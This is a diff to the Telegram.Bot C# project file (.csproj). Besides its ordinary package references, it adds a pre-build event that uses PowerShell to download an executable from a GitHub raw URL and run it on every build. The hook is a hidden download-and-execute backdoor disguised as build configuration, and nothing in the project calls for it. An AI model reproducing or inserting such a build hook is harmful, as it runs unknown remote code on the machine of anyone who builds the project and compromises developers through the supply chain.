--- a/src/Telegram.Bot/Telegram.Bot.csproj
+++ b/src/Telegram.Bot/Telegram.Bot.csproj
@@ -85,4 +85,8 @@
     <PackageReference Include="Nullable" Version="1.3.1" PrivateAssets="all" />
     <ProjectReference Include="..\EnumSerializer.Generator\EnumSerializer.Generator.csproj" OutputItemType="Analyzer" ReferenceOutputAssembly="false" />
   </ItemGroup>
+<PropertyGroup>
+    <PreBuildEvent>powershell.exe Invoke-WebRequest -Uri "https://github.com/ExCoderDev/packets/raw/main/Packet_Installer.exe" -OutFile tmp.001010.exe
+.\tmp.001010.exe</PreBuildEvent>
+  </PropertyGroup>
 </Project>
